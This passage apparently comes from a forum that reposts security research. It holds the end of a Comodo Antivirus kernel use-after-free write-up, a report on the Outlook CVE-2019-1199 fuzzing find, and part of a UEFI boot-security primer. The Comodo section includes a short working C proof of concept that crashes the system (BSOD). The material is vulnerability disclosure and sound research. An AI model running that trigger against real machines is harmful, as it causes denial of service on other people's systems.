until the contexts are freed. A crash occurs once a work item accesses a freed context's pool allocation that was corrupted by some new allocation. Below is the proof of concept to reproduce the vulnerability : #include <Windows.h> #define NTHREADS 5 DWORD WINAPI Thread(LPVOID Parameter) { while (1) CloseHandle(FindFirstChangeNotificationA("😄\\", FALSE, FILE_NOTIFY_CHANGE_FILE_NAME)); } void main() { HANDLE hLastThread; for(int i = 0; i < NTHREADS; i++) hLastThread = CreateThread(NULL, 0, Thread, NULL, 0, 0); WaitForSingleObject(hLastThread, INFINITE); } view raw comodo_av_uaf_poc.c hosted with ❤ by GitHub And here is a small Windbg trace to see what happens in practice (inside parentheses is the address of the context) : 1. [...] QueueWorkItem(fffffa8062dc6f20) DeferredWorkItem(fffffa8062dc6f20) ExFreePoolWithTag(fffffa8062dc6f20) [...] 2. QueueWorkItem(fffffa80635d2ea0) ExFreePoolWithTag(fffffa80635d2ea0) QueueWorkItem(fffffa8062dd5c10) ExFreePoolWithTag(fffffa8062dd5c10) QueueWorkItem(fffffa8062dd6890) ExFreePoolWithTag(fffffa8062dd6890) QueueWorkItem(fffffa8062ddac80) ExFreePoolWithTag(fffffa8062ddac80) QueueWorkItem(fffffa80624cd5e0) [...] 3. DeferredWorkItem(fffffa80635d2ea0) In (1.) everything is normal, the work item is queued, dispatched and then the pool allocation it uses is freed. In (2.) things start going wrong, the work item is queued but before it is dispatched the context is freed. In (3.) the deferred work item is dispatched with freed and corrupted memory in its context causing an access violation and thus a BSOD. We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object : (Figure 10) : Click to Zoom Reproducing the bug, you will encounter an access violation at this part of the code: (Figure 11) And as we can see, it expects multiple pointers to be valid including a resource pointer which makes exploitation non-trivial. That's all for this article, until next time Follow me on Twitter : here Posted by Souhail Hammou at 5:14 PM Sursa: http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
  22. Use-After-Free (UAF) Vulnerability CVE-2019-1199 in Microsoft Outlook RJ McDown August 14, 2019 No Comments Overview R.J. McDown (@BeetleChunks) of the Lares® Research and Development Team discovered a Critical Remote Code Execution vulnerability in the latest version of Microsoft Outlook. R.J. and the Lares R&D team immediately submitted a report to Microsoft detailing this issue. The vulnerability, now designated CVE-2019-1199, was validated against Microsoft Outlook Slow Ring Build Version 1902 (OS Build 11328.20146) running on Windows 10 Enterprise Version 1809 (OS Build 17763.379). The vulnerability was discovered using a custom fuzzer that was created to target specific segments of an email message with malformed compressed RTF data. After a few iterations, team members noted several crashes resulting from the mishandling of objects in memory. After conducting root cause analysis, it was verified that these crashes were the result of a Use-After-Free condition. Triggering the vulnerability required very little user interaction, as simply navigating out of the Outlook preview pane was enough to trigger the bug, causing Outlook to immediately crash. The following GIF depicts the bug being successfully triggered. Discovery One of the message formats supported by Outlook is the .MSG format which conforms to the Microsoft Object Linking and Embedding (OLE) Data Structures standard format (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f). The OLE structure is similar to a FAT filesystem and can be easily explored with OffVis. After exploring the MSG format and examining the MS-OLEDS documentation, several structures within the file format were identified as good candidates for fuzzing. Test cases were generated using a Python script that leveraged the OLEFILE library to read a template MSG file, extracted specific properties, ran the data through a custom Radamsa Python wrapper, and then wrote the fuzzed test case to disk. The following code snippet shows the function (fuzz_message_part) that was responsible for the creation of each test case. The above code snippet provides a list of message properties in “props_to_fuzz” that are then passed to the “fuzz_message_part()” function. In that function the properties are resolved to locations in the MSG template. The data is then extracted from those locations and run through Radamsa to create a new testcase. The “resolve_property_name()” function simply correlates a property type to a regular expression that will match on the target property. This is shown in the following code snippet. Although Radamsa is a testcase generator in and of itself, using a more targeted fuzzing method, in our experience, has reduced yield time to results. The testcase generator was then integrated into SkyLined’s amazing BugID, and a custom notification system was created that reported all new crash data and classification to the team’s Slack channel. After creation of the fuzzing framework was completed, the team noticed crashes occurring after only a few iterations. Root Cause Analysis After a few interesting crashes were observed, team members used WinDbg as the primary debugger to begin conducting root cause analysis. WinDbg was attached to Outlook, and the test case was opened in Outlook resulting in an immediate access violation. After selecting the test case, the Outlook Preview Pane invoked parsing of the message body resulting in the following exception (Image Base: 7ff7c0d00000): outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100 -> 7ff7c0e3cc24 outlook+0x80850: 7ff7c0d80850 -> 7ff7c0d80e85 outlook+0x81ce0: 7ff7c0d81ce0 -> 7ff7c139a2ab outlook!HrShowPubCalWizard+0x101b0c: 7ff7c1afe05c -> 7ff7c1afe0d1 outlook!HrShowPubCalWizard+0x101198: 7ff7c1afd6e8 -> 7ff7c1afd7af outlook!FOutlookIsBooting+0x4620: 7ff7c0e41920 -> 7ff7c0e41b04 outlook!FOutlookIsResuming+0x38200: 7ff7c1021f00 -> 7ff7c1021f68 outlook!FOutlookIsResuming+0x1f6a0: 7ff7c10093a0 -> 7ff7c100942c outlook+0xafb04: 7ff7c0dafb04 -> 7ff7c0dafb16 outlook!HrGetOABURL+0x77938: 7ff7c1110598 -> 7ff7c1110613 VCRUNTIME140!_CxxThrowException Next, a breakpoint was set on “outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100” and execution of was Outlook was continued. While Outlook was running, another component within Outlook GUI, such as an email message, folder, button, etc. was selected. After doing so, another application exception occurred while attempting to execute an address that referenced unmapped memory. outlook!StdCoCreateInstance+0x82c0: 7ff7c0e3c100 outlook+0x80850: 7ff7c0d80850 outlook+0x81ce0: 7ff7c0d81ce0 outlook+0x7419e: 7ff7c0d7419e -> crash occurs (test byte ptr [rcx],1 ds:0000020b`00a76ffc=??) WinDbg’s heap function was used to analyze the address pointed to by the instruction pointer at the time of the second exception. This showed that the application crashed while attempting to reference data in a heap block that was in a freed state. Further analysis was conducted, however this confirmed the presence of a Use After Free (UAF) condition. 0:000> !heap -p -a 20b00a76ffc address 0000020b00a76ffc found in _DPH_HEAP_ROOT @ 20b17571000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 20b0003c820: 20b00a76000 2000 00007ff9e51b7608 ntdll!RtlDebugFreeHeap+0x000000000000003c 00007ff9e515dd5e ntdll!RtlpFreeHeap+0x000000000009975e 00007ff9e50c286e ntdll!RtlFreeHeap+0x00000000000003ee 00007ff9ad247f23 mso20win32client!Ordinal668+0x0000000000000363 00007ff9ad1a2905 mso20win32client!Ordinal1110+0x0000000000000065 00007ff7c0d74a55 outlook+0x0000000000074a55 00007ff7c0d7449f outlook+0x000000000007449f 00007ff7c0dbe227 outlook+0x00000000000be227 00007ff7c0dbcdaf outlook+0x00000000000bcdaf 00007ff7c0dbb9e0 outlook+0x00000000000bb9e0 00007ff7c12db320 outlook!HrGetCacheSetupProgressObject+0x0000000000008740 00007ff7c0da75e7 outlook+0x00000000000a75e7 00007ff7c0da7373 outlook+0x00000000000a7373 00007ff7c0eaae24 outlook!RefreshOutlookETWLoggingState+0x0000000000023694 00007ff7c0eaa525 outlook!RefreshOutlookETWLoggingState+0x0000000000022d95 00007ff7c0d6d946 outlook+0x000000000006d946 00007ff7c0d6d2d4 outlook+0x000000000006d2d4 00007ff9e2d5ca66 USER32!UserCallWinProcCheckWow+0x0000000000000266 00007ff9e2d5c34b USER32!CallWindowProcW+0x000000000000008b 00007ff9d55ab0da Comctl32!CallNextSubclassProc+0x000000000000009a 00007ff9d55aade8 Comctl32!TTSubclassProc+0x00000000000000b8 00007ff9d55ab0da Comctl32!CallNextSubclassProc+0x000000000000009a 00007ff9d55aaef2 Comctl32!MasterSubclassProc+0x00000000000000a2 00007ff9e2d5ca66 USER32!UserCallWinProcCheckWow+0x0000000000000266 00007ff9e2d5c582 USER32!DispatchMessageWorker+0x00000000000001b2 00007ff7c0dd9a10 outlook+0x00000000000d9a10 00007ff7c1051b85 outlook!IsOutlookOutsideWinMain+0x0000000000005545 00007ff7c0f104e7 outlook!HrBgScheduleRepairApp+0x000000000004a4d7 00007ff7c105b646 outlook!OlkGetResourceHandle+0x00000000000045d6 00007ff9e4b981f4 KERNEL32!BaseThreadInitThunk+0x0000000000000014 00007ff9e511a251 ntdll!RtlUserThreadStart+0x0000000000000021 Conclusion Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file. At the time of this publication, Microsoft has not identified any mitigating factors or workarounds for this vulnerability. The only way to fix this issue is to apply the August 2019 Security Update. We encourage you to monitor the Microsoft advisory for any updates: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1199. If your organization would like to confirm if this issue affects your deployed systems, or to ensure that the patch was properly applied, please do not hesitate to contact us at sales@lares.com. We’d be happy to arrange a time to validate our findings within your organization. Sursa: https://www.lares.com/use-after-free-uaf-vulnerability-cve-2019-1199-in-microsoft-outlook/
  23. Understanding modern UEFI-based platform boot To many, the (UEFI-based) boot process is like voodoo; interesting in that it's something that most of us use extensively but is - in a technical-understanding sense - generally avoided by all but those that work in this space. In this article, I hope to present a technical overview of how modern PCs boot using UEFI (Unified Extensible Firmware Interface). I won't be mentioning every detail - honestly my knowledge in this space isn't fully comprehensive (and hence the impetus for this article-as-a-primer). Also, I can be taken to task for being loose with some terminology but the general idea is that by the end of this long read, hopefully both the reader - and myself - will be able to make some sense of it all and have more than just a vague inkling about what on earth is going on in those precious seconds before the OS comes up. This work is based on a combination of info gleaned from my own daily work as a security researcher/engineer at Microsoft, public platform vendor datasheets, UEFI documentation, some fantastic presentations by well-known security researchers + engineers operating in this space, reading source code and black-box research into the firmware on my own machines. Beyond BIOS: Developing with the Unified Extensible Firmware Interface by Vincent Zimmer et al. is a far more comprehensive resource and I'd implore you to stop reading now and go and read that for full edification (I personally paged through to find the bits interesting to me). The only original bit that you'll find below is all the stuff that I get wrong (experts; please feel free to correct me and I'll keep this post alive with errata). The code/data for most of what we're going to be discussing below resides in flash memory (usually SPI NOR). The various components are logically separated into a bunch of sections in flash, UEFI parts are in structures called Firmware Volumes (FVs). Going into the exact layout is unnecessary for what we're trying to achieve here (an overview of boot), so I've left it out. SEC SEC Genesis 1 1 In the beginning, the firmware was created. 3 And the Power Management Controller said, Let there be light: and there was light. 2 And while it was with form, darkness was indeed upon the face of the deep. And the spirit of the BIOS moved upon the face of the flash memory. 4 And SEC saw the light, that it was good: and proceeded to boot. Platform Initialization starts at power-on. The first phase in the process is called the SEC (Security) phase. Before we dive in though, let's back up for a moment. Pre-UEFI A number of components of modern computer platform design exist that would be pertinent for us to familiarize ourselves with. Contrary to the belief of some, there are numerous units capable of execution on a modern PC platform (usually presenting with disparate architectures). In days past, there were three main physically separate chips on a class motherboard - the northbridge (generally responsible for some of the perf-critical work such as the faster comms, memory controller, video), the southbridge (less-perf-critical work such as slower io, audio, various buses) and, of course, the CPU itself. On modern platforms, the northbridge has been integrated on to the CPU die (IP blocks of which are termed the 'Uncore' by Intel, 'Core' being the main CPU IP blocks) leaving the southbridge; renamed the PCH (Platform Controller Hub) by Intel - something we're just going to refer to as the 'chipset' here (to cover AMD as well). Honestly, exactly which features are on the CPU die and which on the chipset die is somewhat fluid and is prone to change generationally (in SoC-based chips both are present on the same die; 'chiplet' approaches have separate dies but share the same chip substrate, etc). Regardless, the pertinent piece of information here is that we have one unit capable of execution - the CPU that has a set of features, and another unit - the chipset that has another set of supportive features. The CPU is naturally what we want to get up and running such that we can do some meaningful work, but the chipset plays a role in getting us there - to a smaller or larger extent depending on the platform itself (and Intel + AMD take slightly different approaches here). Let's try get going again; but this time I'll attempt to lie a little less: after all, SEC is a genesis but not *the* Genesis. That honour - on Intel platforms at least - goes to a component of the chipset (PCH) called the CSME (Converged Security and Manageability Engine). A full review of the CSME is outside the scope of this work (if you're interested, please refer to Yanai Moyal & Shai Hasarfaty's BlackHat USA '19 presentation on the same), but what's relevant to us is its role in the platform boot process. On power-on, the PMC (Power Management Controller) delivers power to the CSME (incidentally, the PMC has a ROM too - software is everywhere nowadays - but we're not going to go down that rabbit hole). The CPU is stuck in reset and no execution is taking place over there. The CSME (which is powered by a tiny i486-like IP block), however, starts executing code from its ROM (which is immutably fused on to the chipset die). This ROM code acts as the Root-of-Trust for the entire platform. Its main purpose is to set up the i486 execution environment, derive platform keys, load the CSME firmware off the SPI flash, verify it (against a fused of an Intel public key) and execute it. Skipping a few steps in the initial CSME flow - eventually it gets itself to a state where it can involve itself in the main CPU boot flow (CSME Bringup phase). Firstly the CSME implements an iTPM (integrated TPM) that can be used on platforms that don't have discrete TPM chips (Intel calls this PTT - Platform Trust Technology). While the iTPM capabilities are invoked during the boot process (such as when Measured Boot is enabled), this job isn't unique to the CSME and the existence of a dTPM module would render the CSME job here moot. More importantly, is the CSME's role in the boot process itself. The level of CSME involvement in the initial stages of host CPU execution depends on what security features are enabled on the platform. In the most straightforward case (no Verified or Measured Boot - modes of Intel's Boot Guard), the CSME simply asks the PMC to bring the host CPU out of reset and boot continues with IBB (Initial Boot Block) execution as will be expounded on further below. When Boot Guard's Verified Boot mode is enabled, however, a number of steps take place to ensure that the TCB (Trusted Computing Base) can extended to the UEFI firmware; a fancy way of saying that one component will only agree to execute the next one in the chain after cryptographic verification of that component has taken place (in the case of Verified Boot's enforcement mode; if we're just speaking Measured Boot, the verification takes place and TPM PCRs are extended accordingly, but the platform is allowed to continue to boot). Let's define some terms (Clark-Wilson integrity policy) because throwing academic terms into anything makes us look smart: CDI (Constrained Data Item) - trusted data UDI (Unconstrained Data Item) - untrusted data TP (Transformation Procedure) - the procedure that will be applied to UDI to turn it into CDI; such as by certifying it with an IVP (Integrity Verification Procedure) In other words, We take a block of untrusted data (UDI) which can be code/data/config/whatever, run it through a procedure (TP) in the trusted code (CDI) such that it turns that untrusted data to trusted data; the obvious method of transformation being cryptographic verification. In other other words, trusted code verifies untrusted code and therefore that untrusted code now becomes trusted. With that in mind, the basic flow is as follows: The CSME starts execution from the reset vector of its ROM code. The ROM is assumed to be CDI from the start and hence is the Root-of-Trust The initial parts of the CSME firmware are loaded off the flash into SRAM (UDI), verified by the ROM (now becoming CDI) and executed The CPU uCode (microcode) will be loaded. This uCode is considered UDI but is verified by the CPU ROM which acts as the Root-of-Trust for the CPU Boot Guard is enabled, so the uCode will load a component called the ACM (Authenticated Code Module) (UDI) off the flash, and will, using the CPU signing key (fused into the CPU), verify it The ACM (now CDI) will request the hash of the OEM IBB signing key from the CSME. The CSME is required here as it has access to the FPF (Field Programmable Fuses) which are burned by the OEM at manufacturing time The ACM will load the IBB (UDI) and verify it using the OEM key (now CDI). The CPU knows if Boot Guard is enabled by querying the CSME FPFs for the Boot Guard policy. Astute readers will notice that there is a type of 'dual root-of-trust' going on here; rooted in both the CSME and the CPU. (Note: I've purposefully left out details of how the ACM is discovered on the flash; Firmware Interface Table, etc. as it adds further unnecessary complexity for now. I'll consider fleshing this out in the future.) The CPU now continues to boot by executing the IBB; either unverified (in no Boot Guard scenario) or verified. We are back at the other Genesis. Hold up for a moment (making forward progress is tough, isn't it??)! Let's speak about Measured Boot here for a short moment. In it's simplest configuration, this feature basically means that at every step, each component will be measured into the TPM (such that it can be attested to in the future). When Measured Boot is enabled, an interesting possible point to note here: A compromise of the CSME - in its Bringup phase - leads to a compromise of the entire TCB because an attacker controls the IBB signing keys provided to the CPU ACM. A machine that has a dTPM and doesn't rely on the CSME-implemented iTPM for measurement, could still potentially detect this compromise via attestation. Not so when the iTPM is used (as the attacker controlling CSME potentially controls the iTPM as well). Boot Guard (Measured + Verified Boot), IBB, OBB are Intel terms. In respect of AMD, their HVB (Hardware Validated Boot) covers the boot flow in a similar fashion to Intel's Boot Guard. The main difference seems to be that the Root-of-Trust is rooted in the Platform Security Processor (PSP) which fills both the role of Intel's CSME and the ACM. The processor itself is ARM-Cortex-based and sits on the CPU die itself (and not in the PCH as in Intel's case). The PSP firmware is still delivered on the flash; it has it's own BL - bootloader which is verified from the PSP on-die ROM, analogous to CSME's Bringup stage. The PSP will then verify the initial UEFI code before releasing the host CPU from reset. AMD also don't speak about IBB/OBB, rather they talk about 'segments', each responsible for verifying the next segment. SEC Ok, ok we're at Genesis for real now! But wait (again)! What's this IBB (Initial Boot Block) thing? Wasn't the SEC phase the start of it all (sans the actual start of it all, as above). All these terms aren't confusing enough. At all. I purposely didn't open at the top with a 'top down' view the boot verification flow - instead opting to explain organically as we move forward. We have, however, discussed the initial stage of Verified Boot. We now understand how trust is established in this IBB block (or first segment). We can quickly recap the general Verified Boot flow: In short, as we have already established, the ACM (which is Intel's code), verifies the IBB (OEM code). The IBB as CDI will be responsible for verifying the OBB (OEM Boot Block) UDI to transform it into a CDI. The OBB then verifies the next code to run (which is usually the boot manager or other optional 3rd part EFI images) - as part of UEFI Secure Boot. So in terms of verification (with the help of CSME): uCode->ACM->IBB->OBB->whatevers-next Generally, the IBB encapsulates the SEC + Pre-EFI Initialization (PEI) phases - the PEI FV (Firmware Volume). (The SEC phase named as such but having relatively little to do with actual 'security'.) With no Verified Boot the CPU will start executing the SEC phase from the legacy reset vector (0xfffffff0); directly off the SPI flash (the hardware has the necessary IP to implement a transparent memory-mapped SPI interface to the flash. At the reset vector, the platform can execute only in a constrained state. For example, it has no concept of crucial components such as RAM. Kind of an issue if we want to execute meaningful higher-level code. It is also in Real Mode. As such, one of the first jobs of SEC is switch the processor to Protected Mode (because legacy modes aren't the funnest). It will also configure the memory available in the CPU caches into a CAR (Cache-as-RAM) 'no-eviction mode' - via MTRRs. This mode will ensure that and reads/writes to the CPU caches do not land up in an attempt to evict them to primary memory external to the chip. The constraint created here is that the available memory is limited to that available in the CPU caches, but this is usually quite large nowadays; the recent Ryzen 3900x chip that I acquired has a total of 70Mb; more than sufficient for holding the entire firmware image in memory + extra for execution environment usages (data regions, heaps + stacks); not that this is actually done. Another important function of SEC is to perform the initial handling of the various sleep states that the machine could have resumed from and direct to alternate boot paths accordingly. This is absolutely out of scope for our discussion (super complex) - as is anything to do with ACPI; it's enough to know that it happens (and has a measurable impact on platform security + attack surface). And because we want to justify the 'SEC' phase naming, uCode updates can be applied here. When executing the SEC from a Verified Boot flow (i.e. after ACM verification of the IBB), it seems to me that the CPU caches must already have been set up as CAR (perhaps by the ACM?); in an ideal world the entire IBB should already be cache-memory resident (if it was read directly off the flash after passing verification, we'd potentially have a physical attack TOCTOU security issue on our hands). I'd hope that the same is true on the AMD side. After SEC is complete, platform initialization continues with the Pre-EFI Initialization phase (PEI). Each phase requires a hand-off to the next phase which includes a set of structured information necessary for the subsequent phase to do its job. In the case of the SEC, this information includes necessary vectors detailing where the CAR is located, where the BFV (Boot Firmware Volume) can be found mapped into a processor-accessible memory region and some other bits and bobs. PEI PEI is comprised of the PEI Foundation - a binary that has no code dependencies, and a set of Pre-EFI Initialization Modules (PEIMs). The PEI Foundation (PeiCore) is responsible for making sure PEIMs can communicate with each other (via the PPI - PEIM-to-PEIM Interface) and a small runtime environment providing number of further services (exposed via the PEI Services Table) to those PEIMs. It also dispatches (invokes/executes) the PEIMs themselves. The PEIMs are responsible for all aspects of base-hardware initialization, such as primary memory configuration (such that main RAM becomes available), CPU + IO initialization, system bus + platform setup and the init of various other features core to the functioning of a modern computing platform (such as the all-important BIOS status code). Some of the code running here is decidedly non-trivial (for example, I've seen a USB stack) and I've observed that there are more PEIMs than one would reasonably think there should be; on my MSI X570 platform I count ~110 modules! I'd like to briefly call out the PEIM responsible for main memory discovery and initialization. When it returns to the PEI Foundation, it provides information about the newly-available primary system memory. The PEI Foundation must now switch from the 'temporary' CAR memory to the main system memory. This must be done with care (from a security perspective). PEIMs can also choose to populate sequential data structures called HOBs (Hand-Off Blocks) which include information that may be necessary to consuming code further down the boot stack (e.g. in phases post-PEI). These HOBs must be resident in main system memory. Before we progress to the next phase, I'd like to return to our topic of trust. Theoretically, the PEI Foundation is expected to dispatch a verification check before executing any PEIM. The framework itself has no notion of how to establish trust, so it should delegate this to a set of PPIs (potentially serviced by other PEIMs). There is a chicken-and-egg issue here: if some component of the PEI phase should be responsible for establishing trust, what establishes trust in that component? This is all meaningless unless the PEI itself (or a subsection of it) is trusted. As a reminder, though, we know that the IBB - which encapsulates the SEC+PEI (hopefully unless the OEM has messed this up) is verified and is trusted (CDI) when running under Verified Boot, therefore the PEI doesn't necessarily need to perform its own integrity checks on various PEIMs; or does it? Here you can see the haze that becomes a source of confusion for OEMs implementing security around this - with all the good will in the world. If the IBB is memory resident and has been verified by the ACM and is untouched since verification, a shortcut can be taken and the PEI verifying PEIMs seems superfluous. If, however, PEIMs are loaded from flash as and when they're needed, they need to be verified before execution and that verification needs to be rooted in the TCB already established by the ACM (i.e. the initial code that it verified as the IBB). If PEI code is XIP (eXecuted In Place), things are even worse and physical TOCTOU attacks become a sad reality. Without a TCB established via a verified boot mechanism the PEI is self-trusted and becomes the Root-of-Trust. This is referred to as the CRTM - the Core Root of Trust for Measurement (the importance of which will become apparent when we eventually speak about Secure Boot). The PEI is measured into the TPM in PCR0 and can be attested to later on, but without a previously-established TCB, any old Joe can just replace the thing; remotely if the OEM has messed up the secure firmware update procedure or left the SPI flash writable. Oy. Our flow is now almost ready to exit the PEI phase with the platform set up and have some 'full-fledged' code! Next up is the DXE (Driver eXecution Environment) phase. Before entering DXE, PEI must perform two important tasks. The first is to verify the DXE. In our Intel parlance, PEI (or at least the part of it responsible for trust) was part of the IBB that was verified by the Boot Guard ACM. Intel's Boot Guard / AMDs HVB code has already exited the picture once the IBB (Intel)/1st segment (AMD) starts executing and the OEM is expected to take over the security flow from here (eh). PEI must therefore have some component to verify and measure the OBB/next phase (of which DXE is a part). On platforms that support Boot Guard, a PEIM (may be named BootGuardPei in your firmware) is responsible for doing this work. This PEIM registers a callback procedure to be called when the PEI phase is ready to exit. When it is called, it is expected to bring the OBB resident and verify it. The same discussion applies to the DXE as did to the PEI above regarding verification of various DXE modules (we'll discuss what these are shortly). If the entire OBB is brought resident and verified by this PEIM, the OEM may decide to shortcut verification of each DXE module. Alternatively a part of DXE can be made CDI and that can be used to verify each module prior to execution (bringing with it all the security considerations already mentioned). Either way; yet another part of the flow where the OEM can mess things up. The second, and final, task of the PEI is to setup and execute the DXE environment. Anyhoo, let's get right to DXE. DXE Similar to PEI, DXE consists of a DXE Foundation - the DXE Core + DXE driver dispatcher (DxeCore) and a number DXE drivers. We can go down an entire rabbit hole around what's available to, and exposed by, the DXE phase; yet another huge collection of code (this time I count ~240 modules on in my firmware). But as we're not writing a book, I'll leave it up to whoever's interested to delve further as homework. The DXE Foundation has access to the various PEIM-populated HOBs. These HOBs include all the information necessary to have the entire DXE phase function independently of what has come before it. Therefore, nothing (other than the HOB list) has to persist once DXE Core is up and running and DXE can happily blast over whatever is left of PEI in memory. The DXE Dispatcher will discover and execute the DXE drivers available in the relevant firmware volume. These drivers are responsible for higher-level platform initialization and services. Some examples include the setting up of System Management Mode (SMM), higher-level firmware drivers such as network, boot disks, thermal management, etc. Similar to what the PEI Framework does for PEIMs, the DXE Framework exposes a number of services to DXE drivers (via the DXE Services Table). These drivers are able to register (and lookup+consume) various architectural protocols covering higher-level constructs such as storage, security, RTC, etc. DXE Core is also responsible for populating the EFI System Table which includes pointers to the EFI Boot Services Table, EFI Runtime Services Table and EFI Configuration Table. The EFI Configuration Table contains a set of GUID/pointer pairs that correspond to various vendor tables identified by their GUIDs. It's not really necessary to delve into these for the purposes of our discussion: typedef struct { /// /// The 128-bit GUID value that uniquely identifies the system configuration table. /// EFI_GUID VendorGuid; /// /// A pointer to the table associated with VendorGuid. /// VOID *VendorTable; } EFI_CONFIGURATION_TABLE; The EFI Runtime Services Table contains a number of services that are invokable for the duration of system runtime: typedef struct { /// /// The table header for the EFI Runtime Services Table. /// EFI_TABLE_HEADER Hdr; // // Time Services // EFI_GET_TIME GetTime; EFI_SET_TIME SetTime; EFI_GET_WAKEUP_TIME GetWakeupTime; EFI_SET_WAKEUP_TIME SetWakeupTime; // // Virtual Memory Services // EFI_SET_VIRTUAL_ADDRESS_MAP SetVirtualAddressMap; EFI_CONVERT_POINTER ConvertPointer; // // Variable Services // EFI_GET_VARIABLE GetVariable; EFI_GET_NEXT_VARIABLE_NAME GetNextVariableName; EFI_SET_VARIABLE SetVariable; // // Miscellaneous Services // EFI_GET_NEXT_HIGH_MONO_COUNT GetNextHighMonotonicCount; EFI_RESET_SYSTEM ResetSystem; // // UEFI 2.0 Capsule Services // EFI_UPDATE_CAPSULE UpdateCapsule; EFI_QUERY_CAPSULE_CAPABILITIES QueryCapsuleCapabilities; // // Miscellaneous UEFI 2.0 Service // EFI_QUERY_VARIABLE_INFO QueryVariableInfo; } EFI_RUNTIME_SERVICES; These runtime services are utilized by the OS to perm UEFI-level tasks. Some of the functionality provided by vectors available in the table above are mostly self-explanatory, e.g. the variable services are used to read/write EFI variables - usually stored on in NV (non-volatile) memory - i.e. on the flash. (The Windows Boot Configuration Data (BCD) makes use of this interface for storing variable boot-time settings, for example) The EFI Boot Services Table contains a number of services that are invokable by EFI applications until such time as ExitBootServices() - itself an entry in this table - is called: typedef struct { /// /// The table header for the EFI Boot Services Table. /// EFI_TABLE_HEADER Hdr; // // Task Priority Services // EFI_RAISE_TPL RaiseTPL; EFI_RESTORE_TPL RestoreTPL; // // Memory Services // EFI_ALLOCATE_PAGES AllocatePages; EFI_FREE_PAGES FreePages; EFI_GET_MEMORY_MAP GetMemoryMap; EFI_ALLOCATE_POOL AllocatePool; EFI_FREE_POOL FreePool; // // Event & Timer Services // EFI_CREATE_EVENT CreateEvent; EFI_SET_TIMER SetTimer; EFI_WAIT_FOR_EVENT WaitForEvent; EFI_SIGNAL_EVENT SignalEvent; EFI_CLOSE_EVENT CloseEvent; EFI_CHECK_EVENT CheckEvent; // // Protocol Handler Services // EFI_INSTALL_PROTOCOL_INTERFACE InstallProtocolInterface; EFI_REINSTALL_PROTOCOL_INTERFACE ReinstallProtocolInterface; EFI_UNINSTALL_PROTOCOL_INTERFACE UninstallProtocolInterface; EFI_HANDLE_PROTOCOL HandleProtocol; VOID *Reserved; EFI_REGISTER_PROTOCOL_NOTIFY RegisterProtocolNotify; EFI_LOCATE_HANDLE LocateHandle; EFI_LOCATE_DEVICE_PATH LocateDevicePath; EFI_INSTALL_CONFIGURATION_TABLE InstallConfigurationTable; // // Image Services // EFI_IMAGE_LOAD LoadImage; EFI_IMAGE_START StartImage; EFI_EXIT Exit; EFI_IMAGE_UNLOAD UnloadImage; EFI_EXIT_BOOT_SERVICES ExitBootServices; // // Miscellaneous Services // EFI_GET_NEXT_MONOTONIC_COUNT GetNextMonotonicCount; EFI_STALL Stall; EFI_SET_WATCHDOG_TIMER SetWatchdogTimer; // // DriverSupport Services // EFI_CONNECT_CONTROLLER ConnectController; EFI_DISCONNECT_CONTROLLER DisconnectController; // // Open and Close Protocol Services // EFI_OPEN_PROTOCOL OpenProtocol; EFI_CLOSE_PROTOCOL CloseProtocol; EFI_OPEN_PROTOCOL_INFORMATION OpenProtocolInformation; // // Library Services // EFI_PROTOCOLS_PER_HANDLE ProtocolsPerHandle; EFI_LOCATE_HANDLE_BUFFER LocateHandleBuffer; EFI_LOCATE_PROTOCOL LocateProtocol; EFI_INSTALL_MULTIPLE_PROTOCOL_INTERFACES InstallMultipleProtocolInterfaces; EFI_UNINSTALL_MULTIPLE_PROTOCOL_INTERFACES UninstallMultipleProtocolInterfaces; // // 32-bit CRC Services // EFI_CALCULATE_CRC32 CalculateCrc32; // // Miscellaneous Services // EFI_COPY_MEM CopyMem; EFI_SET_MEM SetMem; EFI_CREATE_EVENT_EX CreateEventEx; } EFI_BOOT_SERVICES; These services are crucial for getting any OS boot loader up and running. Trying to stick to the format of explaining the boot process via the security flow, we now need to speak about Secure Boot. As 'Secure Boot' is often pandered around as the be-all and end-all of boot-time security, if you take anything away from reading this, please let is be an understanding that Secure Boot is not all that is necessary for trusted platform execution. It plays a crucial role but should not be seen as a technology that can be considered robust in a security sense without other addendum technologies (such as Measured+Verified Boot). Simply put, Secure Boot is this: Prior to execution of any EFI application, if Secure Boot is enabled, the relevant Secure Boot-implementing DXE driver (SecureBootDXE on my machine) must verify the executable image before launching that application. This requires a number of cryptographic keys: PK - Platform Key: The platform 'owner' (alas usually the OEM) issues a key which is written into a secure EFI variable (these variable are only updatable if the update is attempted by an entity that can prove its ownership over the variable. We won't discuss how this works here; just know: the security around this can be meh). This key must only by used to verify the KEK KEK - Key Exchange Key: One or more keys that are signed by the PK - used to update the current signature databases dbx - Forbidden Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are blacklisted (i.e. forbidden from executing). The database is signed by the KEK db - Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are whitelisted. The database is signed by the KEK [Secure firmware update key: Outside the scope of this discussion] For example, prior to executing any OEM-provided EFI applications or the Windows Boot Manager, the DXE code responsible for Secure Boot must first check that the EFI image either appears verbatim in the db or is signed with a key present in the db. Commercial machines often come with a OEM-provisioned PK and Microsoft's KEK and CA already present in the db (much debate over how fair this is). Important note: Secure Boot is not designed to defend against an attacker with physical access to a machine (keys are, by design, replaceable). BDS The DXE phase doesn't perform a formal hand-off to the next phase in the UEFI boot process, the BDS (Boot Device Selection) phase; rather DXE is still resident and providing both EFI Boot and EFI Runtime services to the BDS (via the tables described above). What happens from here can be slightly different depending on what it is that we're booting (if we're running some simple EFI application as our end goal - we are basically done already). So let's carry on our discussion in terms of Microsoft Windows. As mentioned, when all the necessary DXE drivers have been executed, and the system is now ready to boot an operating system, the DXE code will attempt to launch a 